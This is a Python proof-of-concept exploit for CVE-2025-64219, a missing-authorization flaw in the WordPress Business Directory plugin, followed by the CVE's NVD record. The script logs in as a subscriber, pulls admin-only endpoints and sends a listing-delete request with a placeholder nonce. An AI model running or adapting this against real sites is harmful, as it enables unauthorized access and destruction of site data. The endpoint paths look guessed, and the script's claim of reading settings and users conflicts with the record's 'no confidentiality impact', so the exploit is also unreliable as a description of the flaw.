CVE-2025-64219

# CVE-2025-64219 PoC - Business Directory Plugin Broken Access Control # Affected: business-directory-plugin <= 6.4.18 # Type: Missing Authorization import requests import sys TARGET_URL = "https://vulnerable-site.com" WP_API_ENDPOINT = f"{TARGET_URL}/wp-json/business-directory/v1" def exploit_broken_access_control(): """ This PoC demonstrates the broken access control vulnerability. A low-privilege user (subscriber role) can access admin functions. """ # Step 1: Authenticate as low-privilege user (subscriber) session = requests.Session() # Login as subscriber login_data = { 'log': 'attacker_username', 'pwd': 'attacker_password', 'wp-submit': 'Log In' } login_url = f"{TARGET_URL}/wp-login.php" session.post(login_url, data=login_data) # Step 2: Exploit the missing authorization # Access admin-only endpoints without proper permission check exploit_endpoints = [ f"{WP_API_ENDPOINT}/admin/listings", f"{WP_API_ENDPOINT}/admin/categories", f"{WP_API_ENDPOINT}/admin/settings", f"{WP_API_ENDPOINT}/admin/users" ] for endpoint in exploit_endpoints: response = session.get(endpoint) if response.status_code == 200: print(f"[+] Successfully accessed: {endpoint}") print(f" Response: {response.text[:200]}...") elif response.status_code == 403: print(f"[-] Access denied: {endpoint}") else: print(f"[*] Unexpected response: {response.status_code}") # Step 3: Modify data without proper authorization modify_data = { 'listing_id': 'any_listing_id', 'action': 'delete', '_wpnonce': 'bypass_nonce_check' } modify_url = f"{WP_API_ENDPOINT}/admin/listing/modify" response = session.post(modify_url, data=modify_data) if response.status_code in [200, 201]: print("[+] Successfully modified data without proper authorization!") if __name__ == "__main__": print("CVE-2025-64219 PoC - Business Directory Broken Access Control") print("=" * 60) exploit_broken_access_control()

{"cve": {"id": "CVE-2025-64219", "sourceIdentifier": "[email protected]", "published": "2025-10-29T09:15:42.867", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Strategy11 Team Business Directory business-directory-plugin allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Business Directory: from n/a through <= 6.4.18."}, {"lang": "es", "value": "Vulnerabilidad de falta de autorización en el plugin de directorio de negocios Strategy11 Team Business Directory permite la explotación de niveles de seguridad de control de acceso mal configurados. Este problema afecta a Business Directory: desde n/a hasta menor igual que 6.4.18."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/business-directory-plugin/vulnerability/wordpress-business-directory-plugin-6-4-18-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}